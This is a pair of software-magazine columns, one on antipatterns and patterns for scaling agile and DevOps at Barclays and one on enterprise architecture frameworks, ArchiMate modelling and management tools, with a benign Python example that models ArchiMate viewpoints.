The concept of “flow” is a common thread in DevOps. In a previous On DevOps article (“Modular Architectures Make You Agile in the Long Run,” Jan./Feb. 2018, pp. 104–108), Dan Sturtevant summarized how our thinking about software architecture needs to change to support flow. But software architecture alone isn’t enough. If we’re going to take a holistic view of DevOps and agile development, we need to consider how the organization and business need to change. This is easy to consider on a small scale but is an entirely different problem when an organization has tens of thousands of IT staff. Consequently, few people have the experience of implementing flow at scale. Jon Smart, Head of Ways of Working at Barclays, is a rare exception and one of the best thinkers I know on this topic. Here, he shares his experiences on how to shift our perspective on organizational transformation and objectives to take DevOps’ benefits from the small scale of startups and “unicorns” to the massively more complex scale of enterprise IT. —Mik Kersten

As of 2017, only 10 percent of Fortune 500 companies from 1955 were still in the Fortune 500.1 At the current churn rate of the S&P 500, half of the firms will be replaced over the next 10 years.2 Tectonic shifts in the competitive landscape are occurring owing to

› cloud computing;
› mobile devices’ prevalence and capabilities;
› increased communication bandwidth and information transparency;
› increased venture capital funding chasing a return, owing to historically low interest rates and volatility;
› government regulation increasing competition; and
› increased competition from nontraditional born-agile competitors.

These shifts are leading companies to realize that a business-as-usual approach won’t result in business as usual.

In recent years, enterprise-wide DevOps and agile at scale have surged. Compared to nearly 30 years of “lightweight methodologies” for team-level software development, this is a new field. DevOps emerged as a term in 2009, with scaled agile frameworks coming out comparatively recently: SAFe (Scaled Agile Framework) in 2011, Disciplined Agile in 2012, and LeSS (Large-Scale Scrum) in 2013. However, relatively little research is available about these frameworks’ effectiveness in practice, especially on an enterprise scale.

Here, I share lessons learned from being a servant leader for agility at scale across Barclays since 2015. Barclays is a global financial-services firm, with 80,000 employees in 40 countries, founded in 1690 in the City of London. Every day Barclays processes the equivalent of one-third of the UK’s annual GDP—approximately £600 billion. Barclays meets a financial need of almost 50 percent of UK adults and operates in a highly regulated industry.

Context is key; the context here is large, old, complex, not born-agile organizations with many diverse product offerings, colleagues, and customers, used to working in a traditional way. Reinventing organizations with legacy and complexity as we enter the digital revolution is a difficult and interesting challenge in which only the most adaptable will survive. On the basis of my experience, here are the main antipatterns related to scaling agility and DevOps, paired with the patterns that have helped us succeed at Barclays’ scale.

ANTIPATTERN 1: DOING A CAPITAL A, CAPITAL T AGILE TRANSFORMATION

A capital A, capital T Agile Transformation, from an employee’s perspective, implies involuntary, mandatory change being done to you, whether you like it or not. The capital T denotes that you must change; the capital A denotes exactly how you’ll change. This provokes fear and resistance for many reasons,3 including the fear for your survival, which in turn leads to less rational thought as the primitive brain takes over.4

Dan Pink posited three key drivers of motivation: autonomy, purpose, and mastery.5 In this antipattern, two of those drivers—autonomy and mastery—have been taken away. If the “why” isn’t well articulated, meaningful purpose is also removed, eliminating all three key drivers.

FIGURE 1. The Kübler-Ross curve.8 The behaviors during grief also hold true in the context of corporate change. The curve plots morale and competence against time through seven stages: Shock (surprise or shock at the event); Denial (disbelief; looking for evidence that it isn’t true); Frustration (recognition that things are different; sometimes angry); Depression (low mood; lacking in energy); Experiment (initial engagement with the new situation); Decision (learning how to work in the new situation; feeling more positive); and Integration (changes integrated; a renewed individual).


PATTERN 1: START WITH “WHY,” AND FOCUS ON OUTCOMES

As Simon Sinek articulated, start with “why.”6 There should be a clear, well-communicated “why” of the need to change. The “why” should be more than profitability, shareholder returns, or stock price. In “The Irrational Side of Change Management,” Carolyn Aiken and Scott Keller stated,

What the leader cares about (and typically bases at least 80 percent of his or her message to others on) does not tap into roughly 80 percent of the workforce’s primary motivators.7

This research shows that employees are most motivated by a purpose that’s split equally across five forms of impact: society, the customer, the company, the team, and the individual.

From the “why,” identify high-level, thematic desired outcomes, rather than agile for agile’s sake. For us, the desired outcomes are described as Better, Value, Sooner, Safer, and Happier, each of which is measurable.

ANTIPATTERN 2: THE BIGGER THE CAPITAL T, THE BIGGER THE CHANGE CURVE

The Kübler-Ross Curve (see Figure 1) originated from psychiatrist Elisabeth Kübler-Ross’s work on grief. We’ve repeatedly observed these behaviors to hold true in the context of change, via feedback from employee surveys.

The bigger the capital T Transformation, the bigger the change curve. If embarking on one large Transformation, expect a deep dip in the curve. Such a transformation doesn’t apply an agile mind-set to increase organizational agility. It will make the journey more challenging, with more denial, frustration, and anger. The change stands a higher chance of cultural rejection, with more ammunition for those averse to change.

PATTERN 2: ACHIEVE BIG THROUGH SMALL

Instead of a big-bang transformation, with one big dip in the curve, achieve a big outcome through early, frequent, and small slices of value. Pursue evolutionary and continuous transformation aligned to outcomes, linking together a series of smaller change curves. Start in areas that are naturally receptive. The dips aren’t as deep, the learning comes quicker, there’s less risk, and the champions, who have been trying to do this despite the firm in the past, are best placed to beat a path through the organizational jungle.

ANTIPATTERN 3: ONE SIZE FITS ALL

Often combined with the previous antipatterns is the imposition of a one-size-fits-all approach across an organization. Large, old organizations are heterogeneous, not homogeneous. A one-size-fits-all approach won’t maximize the desired outcomes. Scaling is about complexity, diversity, and building a learning and continuous improvement (CI) capability.

With many unique contexts, the practices should differ:

Principles + Context = Practices9

PATTERN 3: FOCUS ON THE OUTCOMES, WITH AN EMPOWERED AND FEDERATED MODEL

Each area has autonomy and is empowered via a federated model to improve on the desired outcomes as it sees fit, with fast feedback supported by training, coaching, and data. The context, culture, history, starting point, and impediments are unique. There’s no silver bullet. People are more likely to accept change if they have autonomy and empowerment to figure out the “how” for themselves, building mastery in the process.5 There should be a small “center of enablement” team that provides servant leadership, coordination, and sharing and owns the resolution of impediments that span business units.

A few areas exist that share a common approach, to ensure organizational consistency. This includes consistent role names (e.g., Product Owner, Agile Team Lead, and Architecture Owner), a consistent target-state organizational-design model, and, especially for regulated firms, a consistent lifecycle that supports continuous delivery.

ANTIPATTERN 4: TRANSFORMATION TREATED AS A PROJECT WITH AN END DATE

A capital T Transformation is launched with fanfare and an initiative name, articulated as a program with an end date, at which the transformation will be done. There’s a significant investment, with significant savings predicted, which further fuels the capital T in Transformation with the need to do more, faster.

PATTERN 4: TRANSFORMATION IS CONTINUOUS

For organizational agility, there is no end date. Transformation is never done; it’s a constant process of learning, retrospection, experimentation, and improvement. The environment in which organizations operate changes constantly, more quickly and unpredictably than ever. Progress is tracked via measures in line with the overall desired outcomes. The goals are to be the best at being better and become a learning organization.

ANTIPATTERN 5: LEADERS SAY, “TELL ME WHEN IT’S DONE”

Leaders have initiated an agile transformation, and the behavior observed is “tell me when it’s done,” with arms metaphorically crossed and little or no change in the leader’s or leadership team’s behavior.

As Frederic Laloux commented,

The level of consciousness of an organization cannot exceed the level of consciousness of its leader.10

PATTERN 5: LEADERS GO FIRST

Transformational leadership is a critical factor for successful ongoing continuous transformations. The 2017 State of DevOps Report showed that teams with the least transformative leaders were half as likely to exhibit high IT performance.11

Leadership can’t be outsourced. It can be supported with coaching, training, and advice to shortcut learning. The first team to adopt continuous transformation should be the leadership team, role-modeling the desired behaviors.

ANTIPATTERN 6: MIDDLE MANAGEMENT HAS NO ROLE

A common antipattern is when middle management, also called the “Frozen Middle,” has no clear role to play in the continuous transformation.12

Middle management not only has a hard job of delivering complex change and keeping stakeholders happy but also now needs to change the way of working at the same time, to a way it hasn’t experienced before. This can be deeply unsettling. Not only am I flying the plane through storms, with expectations on the landing time, I’m also now being asked to both fly it differently and upgrade the plane mid-flight.

PATTERN 6: MIDDLE MANAGEMENT HAS AN EXPLICIT ROLE

Middle management, as well as leaders, needs an explicit role in the continuous transformation. That role is being a coach, trainer, and teacher to one or more mentees, as per the Toyota Improvement Kata:

The primary task of Toyota’s managers and leaders does not revolve around improvement per se, but around increasing the improvement capability of people.13

This gives leaders at all levels a role to play that’s built into the daily work rather than simultaneously being classroom based and empowering the mentee.

ANTIPATTERN 7: NOT INSTITUTIONALIZING THE CHANGE

As John Kotter observed, one antipattern is the failure to institutionalize the change.12 This is manifested in not tackling systemic or behavioral norms in the organization, such that as soon as a key leader who’s championing the change moves on, the organization snaps back to how it used to be with surprising speed.

According to Accelerating Performance, organizations take five years to move up one performance sector and only 18 months to slip back again.14

PATTERN 7: INSTITUTIONALIZE THE CHANGE

For large, old, bureaucratic, complex organizations, especially regulated ones, driving change through official standards can be effective. We’ve rewritten internal standards and the product development lifecycle to embed desired behaviors, such as continuous delivery, long-lived products, and a focus on outcomes over output.

This isn’t scary or intimidating; the “A word” isn’t being used. Internal audits are your friend; they help to independently verify that the standards are implemented and driving the right outcomes.


ANTIPATTERN 8: MEASURING NOTHING OR THE WRONG THINGS

There are five easy ways to reduce the likelihood of a transformation’s success via the inappropriate use of metrics. First, don’t take a data-driven approach. Second, focus on team-level metrics (such as velocity or the “say–do ratio”) and weaponize them. Third, measure just one thing, such that it’s achieved at the expense of other things (for example, measuring flow at the expense of quality). Fourth, measure the workers, not the work system, aiming for busy people. Finally, align top-down targets with anything other than outcomes.

PATTERN 8: MEASURE THE DESIRED OUTCOMES

Take a data-driven approach, with measures that are in line with the desired outcomes (for example, flow, incidents, and the colleague and customer Net Promoter Score). Make this data transparent to all, showing the trend over time.

Focus on the work, not the workers

The biggest issues will be where the work isn’t—that is, the big wait times due to handoffs and dependencies. Measure the flow efficiency in the value stream. In our experience, and anecdotally from other large companies, work typically is being worked on only 10 percent of the time between when it starts and when it reaches the customer’s hands.

ANTIPATTERN 9: NOT PRIORITIZING TECHNICAL EXCELLENCE

The 2017 State of DevOps Report showed that the gap between high- and low-performing organizations is closing regarding deployment frequency and lead time.11 However, the gap is widening for the change failure rate and mean time to recovery. This implies that the low-performing teams are working to improve speed but aren’t sufficiently prioritizing technical excellence or building quality into the process.

PATTERN 9: PRIORITIZE TECHNICAL EXCELLENCE

Along with adopting agile ways of working and reducing lead time, it’s equally important to prioritize investment in automation and the shifting left of quality (that is, incorporating testing early during development), with test-first development and high levels of automation. Tests, code quality analysis, and security scanning are built into the CI pipeline, with the assembly line stopping when an issue arises. Quality becomes part of everyone’s job.

So, here are the takeaways from this article:

› Have a compelling “why.”
› Focus on outcomes, not agile for agile’s sake.
› Achieve big through small.
› Foster autonomy, purpose, and mastery with psychological safety.
› Don’t take a one-size-fits-all approach.
› Pursue continuous transformation and CI.
› Leaders go first.
› Give middle management a role.
› Institutionalize the change.
› Measure the desired outcomes.
› Prioritize technical excellence.

In short, apply an agile mind-set to the rollout of agility, and treat it as a tool in the toolbox to achieve desired organizational outcomes. Approach continuous transformation as a capability to be nurtured rather than as a project with a silver-bullet solution. Be the best at being better.

REFERENCES

1. M.J. Perry, “Fortune 500 Firms 1955 v. 2017: Only 60 Remain, Thanks to the Creative Destruction That Fuels Economic Prosperity,” Am. Enterprise Inst., 20 Oct. 2017; http://www.aei.org/publication/fortune-500-firms-1955-v-2017-only-12-remain-thanks-to-the-creative-destruction-that-fuels-economic-prosperity.

2. S.D. Anthony, S.P. Viguerie, and A. Waldeck, Corporate Longevity: Turbulence Ahead for Large Organizations, Innosight, 2016; https://www.innosight.com/wp-content/uploads/2016/08/Corporate-Longevity-2016-Final.pdf.

3. R.M. Kanter, “Ten Reasons People Resist Change,” Harvard Business Rev., 25 Sept. 2012; https://hbr.org/2012/09/ten-reasons-people-resist-chang.

4. R. Maurer, One Small Step Can Change Your Life: The Kaizen Way, Workman, 2014.


5. D.H. Pink, Drive: The Surprising Truth about What Motivates Us, Riverhead Books, 2009.

6. S. Sinek, “Start with Why,” TED Talk, Sept. 2009; https://www.ted.com/talks/simon_sinek_how_great_leaders_inspire_action.

7. C. Aiken and S. Keller, “The Irrational Side of Change Management,” McKinsey Q., Apr. 2009; https://www.mckinsey.com/business-functions/organization/our-insights/the-irrational-side-of-change-management.

8. Anastasia, “Understanding the Kubler-Ross Curve,” Cleverism, 24 June 2015; https://www.cleverism.com/understanding-kubler-ross-change-curve.

9. D. North, “Kicking the Complexity Habit,” 2014; http://gotocon.com/dl/goto-chicago-2014/slides/DanNorth_KickingTheComplexityHabit.pdf.

10. F. Laloux, Reinventing Organizations, Nelson Parker, 2014.

11. N. Forsgren et al., 2017 State of DevOps Report, Puppet, 2017; https://puppet.com/resources/whitepaper/state-of-devops-report.

12. J.P. Kotter, Leading Change, Harvard Business Rev. Press, 2012.

13. M. Rother, Toyota Kata: Managing People for Improvement, Adaptiveness, and Superior Results, McGraw-Hill, 2009, p. 186.

14. C. Price and S. Toye, Accelerating Performance: How Organizations Can Mobilize, Execute, and Transform with Agility, John Wiley & Sons, 2017.

JONATHAN SMART is Head of Ways of Working at Barclays. Contact him through https://www.linkedin.com/in/jonathansmart.



EDITOR: Christof Ebert, Vector Consulting Services, [email protected]

DEPARTMENT: SOFTWARE TECHNOLOGY

Enterprise Architecture

Ricardo Perez-Castillo, Francisco Ruiz, Mario Piattini, and Christof Ebert

Enterprise Architecture (EA) allows companies to proactively assess and adjust policies and systems to achieve target business goals that monetize relevant business disruptions. The notion and modeling technologies of EA originally stem from the 1980s. With growing digital transformation needs, today EA is widely used in industry as a technology-driven, continuous-change process for companies and our entire society.1 It allows companies to model IT and thus evaluate change needs, including traditional IT, business processes, cloud services, and distributed embedded systems. Therefore, it facilitates the growing needs of converging systems, such as IT services and distributed embedded systems, as in automotive electronics.6

EA is a coherent set of principles, methods, and models used in designing and comprehending the structure of a company, including its business processes, information systems, and IT infrastructure.2 It aligns business and the IT landscape in companies concurrently by managing the increasing system complexity. EA management (EAM) provides a way to holistically understand any system’s fundamental organization through all embodied elements, such as people and their motivations, processes, services, applications, IT resources, and so forth. In this way, EA increases IT efficiency while continuing business innovation.

EA FRAMEWORKS AND MODELING LANGUAGES

Several EA frameworks and standards have recently emerged and achieved relevance. TOGAF3 has been widely adopted in the market—currently 80% of Global 50 companies and 60% of Fortune 500 companies employ it—so it can be considered the de facto standard. TOGAF provides the architecture development method (ADM), which is a methodology for the iterative development of EA. Aside from the TOGAF framework, The Open Group released ArchiMate,4 a modeling language that represents different architectural information; see “Example of the ArchiMate Model.” It allows EA modeling from different viewpoints, in which the position within the cells in Figure 1 highlights the stakeholders’ concerns. ArchiMate considers two dimensions: layers and aspects. Core layers represent the three levels at which it is possible to model an enterprise in ArchiMate, i.e., business, application, and technology. Aspects refer to the active structure, behavior, and passive structure.

This article originally appeared in vol. 36, no. 4, 2019.

FROM THE EDITOR

Digital transformation demands a thorough understanding of technology and impacts. Enterprise architecture (EA) allows companies to model and assess their IT systems, business processes, and distributed services. Authors Ricardo Perez-Castillo, Francisco Ruiz, Mario Piattini, and I dive into EA and state-of-the-practice technologies for EA modeling. As usual, a case study provides direct insight from an ongoing project. I look forward to hearing from both readers and prospective column authors about this column and the technologies you want to know more about. —Christof Ebert

Digital Object Identifier 10.1109/MS.2019.2909329 Date of publication: 18 June 2019


The full framework in ArchiMate 3 also includes additional layers for strategy, physical and implementation/migration elements, and a fourth aspect with motivational (why) elements.
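As an added example, not code from the article or from The Open Group, the following sketches the core framework of Figure 1 as a data structure: each element must sit in a valid layer/aspect cell, and a viewpoint selects the layers and aspects one stakeholder cares about, yielding a view that keeps only the relationships whose both ends survive the cut (the divide-and-conquer viewpoint mechanism the sidebar describes). The element-type names are the ArchiMate 3 type names corresponding to the cells of Figure 1; the sample order-handling model and the two viewpoints are constructed.

```python
"""ArchiMate-style core framework with viewpoints.

Added example; not code from the article or from The Open Group.  The
cell contents follow Figure 1 of the article (using ArchiMate 3 element
type names); the sample model and the viewpoints are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List, Set, Tuple

LAYERS = ("business", "application", "technology")
ASPECTS = ("passive", "behavior", "active")

# Element types allowed in each (layer, aspect) cell of the core framework.
# Adding an element to a cell that does not admit its type is rejected.
CORE_FRAMEWORK: Dict[Tuple[str, str], Set[str]] = {
    ("business", "passive"): {"BusinessObject"},
    ("business", "behavior"): {"BusinessService", "BusinessProcess"},
    ("business", "active"): {"BusinessRole", "BusinessActor"},
    ("application", "passive"): {"DataObject"},
    ("application", "behavior"): {"ApplicationService", "ApplicationFunction"},
    ("application", "active"): {"ApplicationComponent"},
    ("technology", "passive"): {"Artifact"},
    ("technology", "behavior"): {"TechnologyService", "TechnologyFunction"},
    ("technology", "active"): {"Node", "Device", "SystemSoftware"},
}


@dataclass(frozen=True)
class Element:
    name: str
    type: str
    layer: str
    aspect: str


@dataclass(frozen=True)
class Relationship:
    kind: str  # e.g. "serving", "realization", "assignment", "access"
    source: str
    target: str


@dataclass
class Model:
    elements: Dict[str, Element] = field(default_factory=dict)
    relationships: List[Relationship] = field(default_factory=list)

    def add(self, name: str, type_: str, layer: str, aspect: str) -> None:
        allowed = CORE_FRAMEWORK.get((layer, aspect))
        if allowed is None or type_ not in allowed:
            raise ValueError(f"{type_} is not a {aspect} element of the {layer} layer")
        self.elements[name] = Element(name, type_, layer, aspect)

    def relate(self, kind: str, source: str, target: str) -> None:
        for end in (source, target):
            if end not in self.elements:
                raise KeyError(f"unknown element {end!r}")
        self.relationships.append(Relationship(kind, source, target))


@dataclass(frozen=True)
class Viewpoint:
    """Which cells of the framework a stakeholder wants to see."""
    name: str
    layers: FrozenSet[str]
    aspects: FrozenSet[str] = frozenset(ASPECTS)


def build_view(model: Model, viewpoint: Viewpoint):
    """Divide and conquer: keep the elements in the selected cells, and only
    the relationships whose both ends are still in the view."""
    names = {n for n, e in model.elements.items()
             if e.layer in viewpoint.layers and e.aspect in viewpoint.aspects}
    rels = [r for r in model.relationships if r.source in names and r.target in names]
    return names, rels


def sample_model() -> Model:
    """Constructed three-layer model of an order-handling capability."""
    m = Model()
    m.add("Customer", "BusinessActor", "business", "active")
    m.add("Order handling", "BusinessProcess", "business", "behavior")
    m.add("Order", "BusinessObject", "business", "passive")
    m.add("Order service", "ApplicationService", "application", "behavior")
    m.add("Order app", "ApplicationComponent", "application", "active")
    m.add("Order record", "DataObject", "application", "passive")
    m.add("App server", "Node", "technology", "active")
    m.add("Hosting service", "TechnologyService", "technology", "behavior")
    m.add("order-app.war", "Artifact", "technology", "passive")
    m.relate("assignment", "Customer", "Order handling")
    m.relate("access", "Order handling", "Order")
    m.relate("serving", "Order service", "Order handling")     # crosses layers
    m.relate("realization", "Order app", "Order service")
    m.relate("access", "Order app", "Order record")
    m.relate("realization", "Order record", "Order")           # crosses layers
    m.relate("serving", "Hosting service", "Order app")
    m.relate("realization", "order-app.war", "Order app")
    m.relate("assignment", "App server", "order-app.war")
    m.relate("realization", "App server", "Hosting service")
    return m


# Constructed viewpoints: a DevOps team sees application and technology,
# a business manager sees only the business layer.
DEVOPS_VIEWPOINT = Viewpoint("DevOps team", frozenset({"application", "technology"}))
BUSINESS_VIEWPOINT = Viewpoint("Business manager", frozenset({"business"}))

if __name__ == "__main__":
    model = sample_model()
    for vp in (DEVOPS_VIEWPOINT, BUSINESS_VIEWPOINT):
        names, rels = build_view(model, vp)
        print(f"{vp.name}: {sorted(names)} / {len(rels)} relationships")
```

The two cross-layer relationships disappear from both views, which is exactly the abstraction the text describes: each stakeholder sees the elements relevant to their concerns and nothing else.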

Apart from TOGAF, other EA frameworks include DoDAF or MODAF (provided as a defense architecture framework by defense agencies) and the Zachman architecture framework, among other proprietary frameworks and modeling languages used by certain EAM tools or in specific domains.

BENEFITS OF EAM

Companies that implement an EAM can achieve several benefits,5 which can be classified in benefits for business managers and those for IT practitioners.

Business managers receive the following benefits.

› EAM improves the decision-making process. Since EA models can represent an enterprise’s layers and their elements modularly, managers make decisions in the context of the whole rather than of an isolated part.

› Agile adaptability occurs because EAM facilitates the knowledge acquisition that is necessary for changing systems and adopting new components. In other words, it is a tool for digital transformation.

› There is business process improvement and reengineering since EAM can be used to improve the operating procedures by modeling and understanding business processes.

› EAM handles the impact of staff turnover. EA models capture knowledge from the staff, so that business solutions from third-party organizations remain consistently compliant with the current EA models.

The following benefits are for IT and software (SW) practitioners.

› EAM is a tool for managing complexity. It improves the scoping and coordination of software and services, as well as information systems projects in general, by depicting interdependencies in a usable way. New approaches to building software, such as DevOps or microservices, have important advantages, but the other side of the coin is the increased complexity. This is the reason that software development organizations, departments, or teams must increasingly consider EAM.

› EAM can be employed to detect technical resource oversight and, therefore, can identify and remove redundancies.

› EAM controls and shares knowledge modularly. Thus, EA models can be visualized across different levels, which offers different views for different stakeholders according to their concerns while other irrelevant elements are abstracted.

› Since these kinds of resources and systems can be aligned to business strategies and are better placed for responsiveness, IT/software visibility improves.

EAM Tools

EAM includes EA modeling, although it is not limited to this activity. EAM also handles the maintenance and continuous improvement of EA models, different kinds of analysis, and a plan for moving forward toward a desired future state of the organization, among other important activities. Companies can address all of these elements because the proliferation of tools

FIGURE 1. The ArchiMate 3 core framework (adapted from The Open Group4). [Figure rendered as text: layers in rows, aspects in columns.]

Layer / Aspect: Passive Structure | Behavior | Active Structure
Business: Business Objects | Business Services, Business Processes | Business Roles, Business Actors
Application (Information Systems): Data Objects | App Services, App Functions | App Components
Technology: Data Store, Other IT Artifacts | IT Services, IT Functions | IT Systems, IT and Network Devices


EXAMPLE OF THE ARCHIMATE MODEL

The following is a real case study. We supported an IT company in establishing DevOps and migrating their previous enterprise architecture (EA). Figure S1 shows the underlying ArchiMate model to support DevOps in an organization. To address the complexity, which is standard in current software development, EA incorporates the viewpoint mechanism that is based on the divide and conquer principle, which offers each stakeholder only the aspects that are of interest to their concerns. The top part of Figure S1 shows an ArchiMate 3 model with the architecture to support DevOps in an organization. This model is based on the viewpoint shown at the bottom part of Figure S1, which was devised with a DevOps team in mind, integrating elements of development and operations.

Figure S1 presents relevant elements in every layer of the organization according to those depicted in Figure 1.

[Figure S1 was an image in the original; only its labels survive extraction.]

(a) View “DevOps Support to Projects / DevOps Platform”. Labels: DevOps-Development Web Portal; Agile Projects Management; Wiki; IDE; Repository and Version Control; Code Analysis; Continuous Integration; Test Cases Management; Testing Automation; Burndown Diagrams; Monitoring Reports; DevOps Support Manager; IT Infrastructure for DevOps Ecosystem (DevOps: 1 Server, Code Analysis). Tools shown: Selenium, JMeter, TestLink, Jenkins, SonarQube, SVN, Git, SCM-Manager, ECLIPSE, Visual Studio, Confluence, JIRA, JIRA Agile.

(b) Viewpoint “DevOps Ecosystems”. Element types: Artifact; Infrastructure Function; Infrastructure Service; Infrastructure Interface; Node; Device; Location; Communication Path; Network; System Software; DevOps Role; Application Function; Application Component; Specific Business Logic SW Internally Operated; Any Element of DevOps Ecosystem. Note in the figure: “There are also aggregation relationships of each type of element with itself.”

FIGURE S1. An example of the ArchiMate model representing DevOps in an organization. (a) The view and (b) corresponding viewpoint. IDE: integrated development environment; SCM: software control management; SVN: subversion.


covers most of these activities. The following are some common, critical capabilities that must be assessed in any EAM tool.

› Frameworks and standards: EAM tools can support different kinds of frameworks and EA methodologies. Thus, they often provide best-practice workflows to enable rapid deployment and implementation. However, many enterprise architects must implement their own workflows. In addition, it is important to consider the available modeling languages that EAM tools support, as well as the repository metamodel used, to manage all the EA information.

› Modeling: This capability refers to the extent to which the tool allows modeling of all the concepts and elements depicted by the supported frameworks and standards. Usability makes the difference. Additionally, there are two approaches, integration and single point of truth, regarding the information base the EAM modelers use. It depends on whether or not data is collected from a variety of sources.

› Visualization: This refers to efficiently showing adequate information in an acceptable way to the suitable people. An EAM tool should address enterprise cartography challenges, which are based on the following problems that traditional cartography deals with:
  - representing (mapping) a real-world object, i.e., an enterprise in EAM
  - eliminating the characteristics of the mapped object that are irrelevant to the purpose, which is essential to represent the enterprise in a relevant and useful manner
  - orchestrating the elements of the map to best convey its message to its audience according to their specific needs and expectations.

› Decision analysis: Models and EA information analyses are useful for making informed decisions. In this sense, both visualization and collaborative communication capabilities contribute to the success of such decision-making processes.

› Administration and configurability: There are two main approaches regarding the functionality provided by the tool out of the box: preconfigured (EAM solutions) and customization (EAM platforms).

Table 1 collects some of these EAM tools, presented in alphabetical order, by providing the following: name, frameworks and standards supported, benefits for enterprise architects, stronger points for IT/software practitioners, and pricing information. The tools in Table 1 were selected according to several industrial reports provided by well-known consulting companies (e.g., Gartner or Forrester, among others) and our personal experience using some of these EAM tools.

HINTS FOR IT AND SOFTWARE PRACTITIONERS

EA allows IT and software practitioners to manage the complexity of IS and technologies and to align these systems/technologies with their organization’s strategy. Thus, IT and software development teams should integrate people who are skilled and competent for planning and designing EA, as well as for deploying and maintaining it, with an EA profile. This new EA profile for IT/software practitioners should consider the following points.

Notice that the graphical notation of ArchiMate takes many elements from other well-known modeling languages, such as the Unified Modeling Language (UML) or Business Process Model and Notation (BPMN). It is relevant to note that ArchiMate is not an alternative to UML or BPMN but an umbrella to integrate UML, BPMN, and any other kind of specific model. For instance, BPMN is the language suitable to represent the internal details (white box) of processes, while ArchiMate has been considered to represent the things around each process (black box), expressed in relationships with roles, services, organizational structures, strategies, motivations, data, or applications.


TABLE 1. EAM suites. [Reconstructed from the extracted table; columns: tool, frameworks and standards, usefulness for enterprise architects, usefulness for IT/software practitioners, pricing.]

Alfabet EAM
Frameworks and standards: • TOGAF/ArchiMate to guide the EA practice, as well as Zachman • Other industry-specific frameworks (e.g., TMForum or DoDAF)
Usefulness for enterprise architects: • Identifies cost drivers to reduce operational expenses and keeps track of IT investments to assure business growth • Master planning provides the IT organization with a clear overview of the relevant aspects of the IT landscape in order to understand how strategic decisions will and should impact the IT’s tactics and direction over time • Establishes key elements of EA governance, encompassing enterprise-wide policies for the design, implementation, and automation of EA processes • IT strategy and planning process
Usefulness for IT/software practitioners: • Align IT structures with operational objectives and processes to ensure that IT transformation • Three deployment options: cloud, SaaS, and web
Pricing: Pricing has to be requested from commercial department

Archi
Frameworks and standards: • ArchiMate (native support) and aligned with TOGAF
Usefulness for enterprise architects: • Provides a canvas-modeling toolkit that can be used to design and create reusable canvas templates • Since it is open source, it is free although the support is limited
Usefulness for IT/software practitioners: • Integration with other tools is limited but is based on the Eclipse platform, and several plugins are available to expand the main functionality
Pricing: Free, OSS

Avolution Abacus
Frameworks and standards: • Over 100 industry-standard modeling frameworks and notations (e.g., TOGAF, ArchiMate, PEAF)
Usefulness for enterprise architects: • Offers chart roadmaps for IT and business systems and processes • Can assess scenarios using algorithms and tradeoff analysis techniques (discrete event, Monte Carlo, and so on) • Advanced visualization models
Usefulness for IT/software practitioners: • Provides a REST API that simplifies external integrations significantly • Integrates different data sources (limited)
Pricing: Three pricing plans

BiZZdesign Enterprise Studio
Frameworks and standards: • Strongly focuses on TOGAF, ArchiMate, BPMN, and UML, among others • Native ArchiMate 3 support for consistent modeling • Strong support and integration with TOGAF ADM
Usefulness for enterprise architects: • Supports motivational diagrams • Business design capabilities and analyses as well as support for decision making with customizable views and dashboards • Extra features such as transformation roadmapping, capability mapping, and risk assessment • Provides coherent data governance structure with roles and responsibilities linked to your architecture and organization
Usefulness for IT/software practitioners: • Some diagrams can be generated automatically
Pricing: Pricing has to be requested from commercial department

BOC Group ADOIT
Frameworks and standards: • TOGAF and ArchiMate • BizBok, BIAN • COBIT and ITIL
Usefulness for enterprise architects: • Support for strategic company planning • Support for cloud migration, which helps to identify and analyze the most valuable IT assets, cost drivers, and the information, technology, and security risks of migrating to the cloud
Usefulness for IT/software practitioners: • Continuously optimize your application and technology portfolio
Pricing: Pricing has to be requested • Available as a product or SaaS • ADOIT: community edition free

Dragon1
Frameworks and standards: • Proprietary notation but supports TOGAF (ADM) and ArchiMate among others
Usefulness for enterprise architects: • Advanced modeling and visualization features • A set of different web-based tools to support decision management, EA, project management, risk management, governance, compliance, IT portfolio management, and business process analysis • Rationalize applications in a smart way using an application landscape diagram
Usefulness for IT/software practitioners: • Advanced importing/exporting functionalities between different EA repositories
Pricing: Two versions: US$390–3,980/year (individual); US$45,000/year (company)

EAMs
Frameworks and standards: • Customized architectural representations and navigation paths; can extract information from BPMN, UML, ArchiMate, and IDEF, among others
Usefulness for enterprise architects: • An EA tool on its own that integrates and harvests operational information to enrich architecture analysis and decision making • Live architecture: see the architecture of the organization as emerging from ongoing into foreseen projects through historization • Support enterprise cartography
Usefulness for IT/software practitioners: • Architectural views must be generated automatically, since “handmade” models do require a major effort to update and refer to a single point in time, especially where software practitioners are not skilled enough in EA
Pricing: Pricing has to be requested from commercial department. Four different plans.

Essential
Frameworks and standards: • Specific based on the Protégé Ontology Project. Available custom-built Protege extensions
Usefulness for enterprise architects: • Provides a flexible and extensible means to generate the views on the model captured using the essential modeler • Allow organizations to define and publish custom views and reports to meet their individual needs
Usefulness for IT/software practitioners: • A Java-based web application that runs on any standard Java server platform. Uses a knowledge repository optionally supported by an RDBMS
Pricing: Free, OSS

Future tech systems Envision VIP
Frameworks and standards: • DoDAF, pragmatic EA, TOGAF, UML, BPMN, Zachman • Integrates several kinds of models, not only EA models
Usefulness for enterprise architects: • Envision your future: “to be” models show the investment required and benefits to be gained by re-engineering
Usefulness for IT/software practitioners: • Practitioners can apply filters and rules to manage and analyze models using techniques such as spreadsheet-like matrix analysis, powerful report writing tools, and SQL queries • Models and other information can be exported to other productivity applications and databases
Pricing: Pricing has to be requested from commercial department • Available as a product and SaaS

IBM Rational Software Architect
Frameworks and standards: • Proprietary; ArchiMate is supported through third-party plugins
Usefulness for enterprise architects: • Allow enterprise analysis for making fast, value-based decisions • This is not only an EAM tool but a general-purpose tool
Usefulness for IT/software practitioners: • Solutions for DevOps and continuous engineering • Provides integration with many other products, especially those from the IBM ecosystem
Pricing: US$500–2,200/year

Leanix
Frameworks and standards: • Framework and standard independent, but TOGAF can be implemented with Leanix
Usefulness for enterprise architects: • Offers the possibility of following the TOGAF ADM methodology and support an agile version of that methodology
Usefulness for IT/software practitioners: • Integration with many other software engineering tools (e.g., GitHub, GitLab, Jenkins, Confluence, Pentaho, Tableau, SAP)
Pricing: On demand: has to be requested, two pricing plans. Advanced features: US$5,700/month

Modelio
Frameworks and standards: • TOGAF • UML, BPMN • SoaML, SysML
Usefulness for enterprise architects: • Open source editor supporting TOGAF with an extension mechanism • Not an EAM tool itself, it is a general-purpose modeling tool that supports EA modeling
Usefulness for IT/software practitioners: • Flexible extension mechanism • Scripting language support (Jython)
